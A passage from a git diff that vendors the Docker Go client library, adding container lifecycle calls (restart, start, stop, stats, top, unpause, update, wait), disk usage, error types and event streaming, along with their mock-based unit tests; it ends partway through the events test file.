+func (cli *Client) ContainerRestart(ctx context.Context, containerID string, timeout *time.Duration) error { + query := url.Values{} + if timeout != nil { + query.Set("t", timetypes.DurationToSecondsString(*timeout)) + } + resp, err := cli.post(ctx, "/containers/"+containerID+"/restart", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_restart_test.go b/vendor/github.com/docker/docker/client/container_restart_test.go new file mode 100644 index 0000000000..8c3cfd6a6f --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_restart_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + "time" + + "golang.org/x/net/context" +) + +func TestContainerRestartError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + timeout := 0 * time.Second + err := client.ContainerRestart(context.Background(), "nothing", &timeout) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerRestart(t *testing.T) { + expectedURL := "/containers/container_id/restart" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + t := req.URL.Query().Get("t") + if t != "100" { + return nil, fmt.Errorf("t (timeout) not set in URL query properly. 
Expected '100', got %s", t) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + timeout := 100 * time.Second + err := client.ContainerRestart(context.Background(), "container_id", &timeout) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_start.go b/vendor/github.com/docker/docker/client/container_start.go new file mode 100644 index 0000000000..b1f08de416 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_start.go @@ -0,0 +1,24 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +// ContainerStart sends a request to the docker daemon to start a container. +func (cli *Client) ContainerStart(ctx context.Context, containerID string, options types.ContainerStartOptions) error { + query := url.Values{} + if len(options.CheckpointID) != 0 { + query.Set("checkpoint", options.CheckpointID) + } + if len(options.CheckpointDir) != 0 { + query.Set("checkpoint-dir", options.CheckpointDir) + } + + resp, err := cli.post(ctx, "/containers/"+containerID+"/start", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_start_test.go b/vendor/github.com/docker/docker/client/container_start_test.go new file mode 100644 index 0000000000..5826fa8bc7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_start_test.go @@ -0,0 +1,58 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestContainerStartError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerStart(context.Background(), "nothing", types.ContainerStartOptions{}) + if err == nil || 
err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerStart(t *testing.T) { + expectedURL := "/containers/container_id/start" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + // we're not expecting any payload, but if one is supplied, check it is valid. + if req.Header.Get("Content-Type") == "application/json" { + var startConfig interface{} + if err := json.NewDecoder(req.Body).Decode(&startConfig); err != nil { + return nil, fmt.Errorf("Unable to parse json: %s", err) + } + } + + checkpoint := req.URL.Query().Get("checkpoint") + if checkpoint != "checkpoint_id" { + return nil, fmt.Errorf("checkpoint not set in URL query properly. Expected 'checkpoint_id', got %s", checkpoint) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerStart(context.Background(), "container_id", types.ContainerStartOptions{CheckpointID: "checkpoint_id"}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_stats.go b/vendor/github.com/docker/docker/client/container_stats.go new file mode 100644 index 0000000000..4758c66e32 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stats.go @@ -0,0 +1,26 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerStats returns near realtime stats for a given container. +// It's up to the caller to close the io.ReadCloser returned. 
+func (cli *Client) ContainerStats(ctx context.Context, containerID string, stream bool) (types.ContainerStats, error) { + query := url.Values{} + query.Set("stream", "0") + if stream { + query.Set("stream", "1") + } + + resp, err := cli.get(ctx, "/containers/"+containerID+"/stats", query, nil) + if err != nil { + return types.ContainerStats{}, err + } + + osType := getDockerOS(resp.header.Get("Server")) + return types.ContainerStats{Body: resp.body, OSType: osType}, err +} diff --git a/vendor/github.com/docker/docker/client/container_stats_test.go b/vendor/github.com/docker/docker/client/container_stats_test.go new file mode 100644 index 0000000000..7414f135c3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stats_test.go @@ -0,0 +1,70 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerStatsError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerStats(context.Background(), "nothing", false) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerStats(t *testing.T) { + expectedURL := "/containers/container_id/stats" + cases := []struct { + stream bool + expectedStream string + }{ + { + expectedStream: "0", + }, + { + stream: true, + expectedStream: "1", + }, + } + for _, c := range cases { + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + + query := r.URL.Query() + stream := query.Get("stream") + if stream != c.expectedStream { + return nil, fmt.Errorf("stream not set in URL query properly. 
Expected '%s', got %s", c.expectedStream, stream) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + resp, err := client.ContainerStats(context.Background(), "container_id", c.stream) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + content, err := ioutil.ReadAll(resp.Body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/container_stop.go b/vendor/github.com/docker/docker/client/container_stop.go new file mode 100644 index 0000000000..b5418ae8c8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stop.go @@ -0,0 +1,21 @@ +package client + +import ( + "net/url" + "time" + + timetypes "github.com/docker/docker/api/types/time" + "golang.org/x/net/context" +) + +// ContainerStop stops a container without terminating the process. +// The process is blocked until the container stops or the timeout expires. 
+func (cli *Client) ContainerStop(ctx context.Context, containerID string, timeout *time.Duration) error { + query := url.Values{} + if timeout != nil { + query.Set("t", timetypes.DurationToSecondsString(*timeout)) + } + resp, err := cli.post(ctx, "/containers/"+containerID+"/stop", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_stop_test.go b/vendor/github.com/docker/docker/client/container_stop_test.go new file mode 100644 index 0000000000..c32cd691c4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stop_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + "time" + + "golang.org/x/net/context" +) + +func TestContainerStopError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + timeout := 0 * time.Second + err := client.ContainerStop(context.Background(), "nothing", &timeout) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerStop(t *testing.T) { + expectedURL := "/containers/container_id/stop" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + t := req.URL.Query().Get("t") + if t != "100" { + return nil, fmt.Errorf("t (timeout) not set in URL query properly. 
Expected '100', got %s", t) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + timeout := 100 * time.Second + err := client.ContainerStop(context.Background(), "container_id", &timeout) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_top.go b/vendor/github.com/docker/docker/client/container_top.go new file mode 100644 index 0000000000..4e7270ea22 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_top.go @@ -0,0 +1,28 @@ +package client + +import ( + "encoding/json" + "net/url" + "strings" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerTop shows process information from within a container. +func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (types.ContainerProcessList, error) { + var response types.ContainerProcessList + query := url.Values{} + if len(arguments) > 0 { + query.Set("ps_args", strings.Join(arguments, " ")) + } + + resp, err := cli.get(ctx, "/containers/"+containerID+"/top", query, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_top_test.go b/vendor/github.com/docker/docker/client/container_top_test.go new file mode 100644 index 0000000000..7802be063e --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_top_test.go @@ -0,0 +1,74 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerTopError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerTop(context.Background(), 
"nothing", []string{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerTop(t *testing.T) { + expectedURL := "/containers/container_id/top" + expectedProcesses := [][]string{ + {"p1", "p2"}, + {"p3"}, + } + expectedTitles := []string{"title1", "title2"} + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + args := query.Get("ps_args") + if args != "arg1 arg2" { + return nil, fmt.Errorf("args not set in URL query properly. Expected 'arg1 arg2', got %v", args) + } + + b, err := json.Marshal(types.ContainerProcessList{ + Processes: [][]string{ + {"p1", "p2"}, + {"p3"}, + }, + Titles: []string{"title1", "title2"}, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + processList, err := client.ContainerTop(context.Background(), "container_id", []string{"arg1", "arg2"}) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(expectedProcesses, processList.Processes) { + t.Fatalf("Processes: expected %v, got %v", expectedProcesses, processList.Processes) + } + if !reflect.DeepEqual(expectedTitles, processList.Titles) { + t.Fatalf("Titles: expected %v, got %v", expectedTitles, processList.Titles) + } +} diff --git a/vendor/github.com/docker/docker/client/container_unpause.go b/vendor/github.com/docker/docker/client/container_unpause.go new file mode 100644 index 0000000000..5c76211256 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_unpause.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// ContainerUnpause resumes the process execution within a container +func (cli *Client) ContainerUnpause(ctx 
context.Context, containerID string) error { + resp, err := cli.post(ctx, "/containers/"+containerID+"/unpause", nil, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_unpause_test.go b/vendor/github.com/docker/docker/client/container_unpause_test.go new file mode 100644 index 0000000000..2c42727191 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_unpause_test.go @@ -0,0 +1,41 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerUnpauseError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerUnpause(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerUnpause(t *testing.T) { + expectedURL := "/containers/container_id/unpause" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.ContainerUnpause(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_update.go b/vendor/github.com/docker/docker/client/container_update.go new file mode 100644 index 0000000000..5082f22dfa --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_update.go @@ -0,0 +1,22 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/container" + "golang.org/x/net/context" +) + +// ContainerUpdate updates resources of a container +func 
(cli *Client) ContainerUpdate(ctx context.Context, containerID string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error) { + var response container.ContainerUpdateOKBody + serverResp, err := cli.post(ctx, "/containers/"+containerID+"/update", nil, updateConfig, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(serverResp.body).Decode(&response) + + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_update_test.go b/vendor/github.com/docker/docker/client/container_update_test.go new file mode 100644 index 0000000000..715bb7ca23 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_update_test.go @@ -0,0 +1,58 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/container" + "golang.org/x/net/context" +) + +func TestContainerUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerUpdate(context.Background(), "nothing", container.UpdateConfig{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerUpdate(t *testing.T) { + expectedURL := "/containers/container_id/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + b, err := json.Marshal(container.ContainerUpdateOKBody{}) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + _, err := client.ContainerUpdate(context.Background(), "container_id", container.UpdateConfig{ + 
Resources: container.Resources{ + CPUPeriod: 1, + }, + RestartPolicy: container.RestartPolicy{ + Name: "always", + }, + }) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_wait.go b/vendor/github.com/docker/docker/client/container_wait.go new file mode 100644 index 0000000000..93212c70ee --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_wait.go @@ -0,0 +1,26 @@ +package client + +import ( + "encoding/json" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/container" +) + +// ContainerWait pauses execution until a container exits. +// It returns the API status code as response of its readiness. +func (cli *Client) ContainerWait(ctx context.Context, containerID string) (int64, error) { + resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil) + if err != nil { + return -1, err + } + defer ensureReaderClosed(resp) + + var res container.ContainerWaitOKBody + if err := json.NewDecoder(resp.body).Decode(&res); err != nil { + return -1, err + } + + return res.StatusCode, nil +} diff --git a/vendor/github.com/docker/docker/client/container_wait_test.go b/vendor/github.com/docker/docker/client/container_wait_test.go new file mode 100644 index 0000000000..9300bc0a54 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_wait_test.go @@ -0,0 +1,70 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "log" + "net/http" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + + "golang.org/x/net/context" +) + +func TestContainerWaitError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + code, err := client.ContainerWait(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + if code != -1 { + 
t.Fatalf("expected a status code equal to '-1', got %d", code) + } +} + +func TestContainerWait(t *testing.T) { + expectedURL := "/containers/container_id/wait" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + b, err := json.Marshal(container.ContainerWaitOKBody{ + StatusCode: 15, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + code, err := client.ContainerWait(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if code != 15 { + t.Fatalf("expected a status code equal to '15', got %d", code) + } +} + +func ExampleClient_ContainerWait_withTimeout() { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + client, _ := NewEnvClient() + _, err := client.ContainerWait(ctx, "container_id") + if err != nil { + log.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/disk_usage.go b/vendor/github.com/docker/docker/client/disk_usage.go new file mode 100644 index 0000000000..03c80b39af --- /dev/null +++ b/vendor/github.com/docker/docker/client/disk_usage.go @@ -0,0 +1,26 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// DiskUsage requests the current data usage from the daemon +func (cli *Client) DiskUsage(ctx context.Context) (types.DiskUsage, error) { + var du types.DiskUsage + + serverResp, err := cli.get(ctx, "/system/df", nil, nil) + if err != nil { + return du, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&du); err != nil { + return du, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return du, nil +} diff --git 
a/vendor/github.com/docker/docker/client/errors.go b/vendor/github.com/docker/docker/client/errors.go new file mode 100644 index 0000000000..bf6923f134 --- /dev/null +++ b/vendor/github.com/docker/docker/client/errors.go @@ -0,0 +1,278 @@ +package client + +import ( + "fmt" + + "github.com/docker/docker/api/types/versions" + "github.com/pkg/errors" +) + +// errConnectionFailed implements an error returned when connection failed. +type errConnectionFailed struct { + host string +} + +// Error returns a string representation of an errConnectionFailed +func (err errConnectionFailed) Error() string { + if err.host == "" { + return "Cannot connect to the Docker daemon. Is the docker daemon running on this host?" + } + return fmt.Sprintf("Cannot connect to the Docker daemon at %s. Is the docker daemon running?", err.host) +} + +// IsErrConnectionFailed returns true if the error is caused by connection failed. +func IsErrConnectionFailed(err error) bool { + _, ok := errors.Cause(err).(errConnectionFailed) + return ok +} + +// ErrorConnectionFailed returns an error with host in the error message when connection to docker daemon failed. +func ErrorConnectionFailed(host string) error { + return errConnectionFailed{host: host} +} + +type notFound interface { + error + NotFound() bool // Is the error a NotFound error +} + +// IsErrNotFound returns true if the error is caused with an +// object (image, container, network, volume, …) is not found in the docker host. +func IsErrNotFound(err error) bool { + te, ok := err.(notFound) + return ok && te.NotFound() +} + +// imageNotFoundError implements an error returned when an image is not in the docker host. 
+type imageNotFoundError struct { + imageID string +} + +// NotFound indicates that this error type is of NotFound +func (e imageNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of an imageNotFoundError +func (e imageNotFoundError) Error() string { + return fmt.Sprintf("Error: No such image: %s", e.imageID) +} + +// IsErrImageNotFound returns true if the error is caused +// when an image is not found in the docker host. +func IsErrImageNotFound(err error) bool { + return IsErrNotFound(err) +} + +// containerNotFoundError implements an error returned when a container is not in the docker host. +type containerNotFoundError struct { + containerID string +} + +// NotFound indicates that this error type is of NotFound +func (e containerNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a containerNotFoundError +func (e containerNotFoundError) Error() string { + return fmt.Sprintf("Error: No such container: %s", e.containerID) +} + +// IsErrContainerNotFound returns true if the error is caused +// when a container is not found in the docker host. +func IsErrContainerNotFound(err error) bool { + return IsErrNotFound(err) +} + +// networkNotFoundError implements an error returned when a network is not in the docker host. +type networkNotFoundError struct { + networkID string +} + +// NotFound indicates that this error type is of NotFound +func (e networkNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a networkNotFoundError +func (e networkNotFoundError) Error() string { + return fmt.Sprintf("Error: No such network: %s", e.networkID) +} + +// IsErrNetworkNotFound returns true if the error is caused +// when a network is not found in the docker host. +func IsErrNetworkNotFound(err error) bool { + return IsErrNotFound(err) +} + +// volumeNotFoundError implements an error returned when a volume is not in the docker host. 
+type volumeNotFoundError struct { + volumeID string +} + +// NotFound indicates that this error type is of NotFound +func (e volumeNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a volumeNotFoundError +func (e volumeNotFoundError) Error() string { + return fmt.Sprintf("Error: No such volume: %s", e.volumeID) +} + +// IsErrVolumeNotFound returns true if the error is caused +// when a volume is not found in the docker host. +func IsErrVolumeNotFound(err error) bool { + return IsErrNotFound(err) +} + +// unauthorizedError represents an authorization error in a remote registry. +type unauthorizedError struct { + cause error +} + +// Error returns a string representation of an unauthorizedError +func (u unauthorizedError) Error() string { + return u.cause.Error() +} + +// IsErrUnauthorized returns true if the error is caused +// when a remote registry authentication fails +func IsErrUnauthorized(err error) bool { + _, ok := err.(unauthorizedError) + return ok +} + +// nodeNotFoundError implements an error returned when a node is not found. +type nodeNotFoundError struct { + nodeID string +} + +// Error returns a string representation of a nodeNotFoundError +func (e nodeNotFoundError) Error() string { + return fmt.Sprintf("Error: No such node: %s", e.nodeID) +} + +// NotFound indicates that this error type is of NotFound +func (e nodeNotFoundError) NotFound() bool { + return true +} + +// IsErrNodeNotFound returns true if the error is caused +// when a node is not found. +func IsErrNodeNotFound(err error) bool { + _, ok := err.(nodeNotFoundError) + return ok +} + +// serviceNotFoundError implements an error returned when a service is not found. 
+type serviceNotFoundError struct { + serviceID string +} + +// Error returns a string representation of a serviceNotFoundError +func (e serviceNotFoundError) Error() string { + return fmt.Sprintf("Error: No such service: %s", e.serviceID) +} + +// NotFound indicates that this error type is of NotFound +func (e serviceNotFoundError) NotFound() bool { + return true +} + +// IsErrServiceNotFound returns true if the error is caused +// when a service is not found. +func IsErrServiceNotFound(err error) bool { + _, ok := err.(serviceNotFoundError) + return ok +} + +// taskNotFoundError implements an error returned when a task is not found. +type taskNotFoundError struct { + taskID string +} + +// Error returns a string representation of a taskNotFoundError +func (e taskNotFoundError) Error() string { + return fmt.Sprintf("Error: No such task: %s", e.taskID) +} + +// NotFound indicates that this error type is of NotFound +func (e taskNotFoundError) NotFound() bool { + return true +} + +// IsErrTaskNotFound returns true if the error is caused +// when a task is not found. 
+func IsErrTaskNotFound(err error) bool { + _, ok := err.(taskNotFoundError) + return ok +} + +type pluginPermissionDenied struct { + name string +} + +func (e pluginPermissionDenied) Error() string { + return "Permission denied while installing plugin " + e.name +} + +// IsErrPluginPermissionDenied returns true if the error is caused +// when a user denies a plugin's permissions +func IsErrPluginPermissionDenied(err error) bool { + _, ok := err.(pluginPermissionDenied) + return ok +} + +// NewVersionError returns an error if the APIVersion required +// if less than the current supported version +func (cli *Client) NewVersionError(APIrequired, feature string) error { + if versions.LessThan(cli.version, APIrequired) { + return fmt.Errorf("%q requires API version %s, but the Docker server is version %s", feature, APIrequired, cli.version) + } + return nil +} + +// secretNotFoundError implements an error returned when a secret is not found. +type secretNotFoundError struct { + name string +} + +// Error returns a string representation of a secretNotFoundError +func (e secretNotFoundError) Error() string { + return fmt.Sprintf("Error: no such secret: %s", e.name) +} + +// NoFound indicates that this error type is of NotFound +func (e secretNotFoundError) NotFound() bool { + return true +} + +// IsErrSecretNotFound returns true if the error is caused +// when a secret is not found. +func IsErrSecretNotFound(err error) bool { + _, ok := err.(secretNotFoundError) + return ok +} + +// pluginNotFoundError implements an error returned when a plugin is not in the docker host. 
+type pluginNotFoundError struct { + name string +} + +// NotFound indicates that this error type is of NotFound +func (e pluginNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a pluginNotFoundError +func (e pluginNotFoundError) Error() string { + return fmt.Sprintf("Error: No such plugin: %s", e.name) +} + +// IsErrPluginNotFound returns true if the error is caused +// when a plugin is not found in the docker host. +func IsErrPluginNotFound(err error) bool { + return IsErrNotFound(err) +} diff --git a/vendor/github.com/docker/docker/client/events.go b/vendor/github.com/docker/docker/client/events.go new file mode 100644 index 0000000000..af47aefa74 --- /dev/null +++ b/vendor/github.com/docker/docker/client/events.go @@ -0,0 +1,102 @@ +package client + +import ( + "encoding/json" + "net/url" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + timetypes "github.com/docker/docker/api/types/time" +) + +// Events returns a stream of events in the daemon. It's up to the caller to close the stream +// by cancelling the context. Once the stream has been completely read an io.EOF error will +// be sent over the error channel. If an error is sent all processing will be stopped. It's up +// to the caller to reopen the stream in the event of an error by reinvoking this method. 
+func (cli *Client) Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error) { + + messages := make(chan events.Message) + errs := make(chan error, 1) + + started := make(chan struct{}) + go func() { + defer close(errs) + + query, err := buildEventsQueryParams(cli.version, options) + if err != nil { + close(started) + errs <- err + return + } + + resp, err := cli.get(ctx, "/events", query, nil) + if err != nil { + close(started) + errs <- err + return + } + defer resp.body.Close() + + decoder := json.NewDecoder(resp.body) + + close(started) + for { + select { + case <-ctx.Done(): + errs <- ctx.Err() + return + default: + var event events.Message + if err := decoder.Decode(&event); err != nil { + errs <- err + return + } + + select { + case messages <- event: + case <-ctx.Done(): + errs <- ctx.Err() + return + } + } + } + }() + <-started + + return messages, errs +} + +func buildEventsQueryParams(cliVersion string, options types.EventsOptions) (url.Values, error) { + query := url.Values{} + ref := time.Now() + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, ref) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Until != "" { + ts, err := timetypes.GetTimestamp(options.Until, ref) + if err != nil { + return nil, err + } + query.Set("until", ts) + } + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cliVersion, options.Filters) + if err != nil { + return nil, err + } + query.Set("filters", filterJSON) + } + + return query, nil +} diff --git a/vendor/github.com/docker/docker/client/events_test.go b/vendor/github.com/docker/docker/client/events_test.go new file mode 100644 index 0000000000..ba82d2f542 --- /dev/null +++ b/vendor/github.com/docker/docker/client/events_test.go @@ -0,0 +1,165 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "strings" + "testing" + + 
"golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" +) + +func TestEventsErrorInOptions(t *testing.T) { + errorCases := []struct { + options types.EventsOptions + expectedError string + }{ + { + options: types.EventsOptions{ + Since: "2006-01-02TZ", + }, + expectedError: `parsing time "2006-01-02TZ"`, + }, + { + options: types.EventsOptions{ + Until: "2006-01-02TZ", + }, + expectedError: `parsing time "2006-01-02TZ"`, + }, + } + for _, e := range errorCases { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, errs := client.Events(context.Background(), e.options) + err := <-errs + if err == nil || !strings.Contains(err.Error(), e.expectedError) { + t.Fatalf("expected an error %q, got %v", e.expectedError, err) + } + } +} + +func TestEventsErrorFromServer(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, errs := client.Events(context.Background(), types.EventsOptions{}) + err := <-errs + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestEvents(t *testing.T) { + + expectedURL := "/events" + + filters := filters.NewArgs() + filters.Add("type", events.ContainerEventType) + expectedFiltersJSON := fmt.Sprintf(`{"type":{"%s":true}}`, events.ContainerEventType) + + eventsCases := []struct { + options types.EventsOptions + events []events.Message + expectedEvents map[string]bool + expectedQueryParams map[string]string + }{ + { + options: types.EventsOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": expectedFiltersJSON, + }, + events: []events.Message{}, + expectedEvents: make(map[string]bool), + }, + { + options: types.EventsOptions{ + Filters: filters, + }, + expectedQueryParams: 
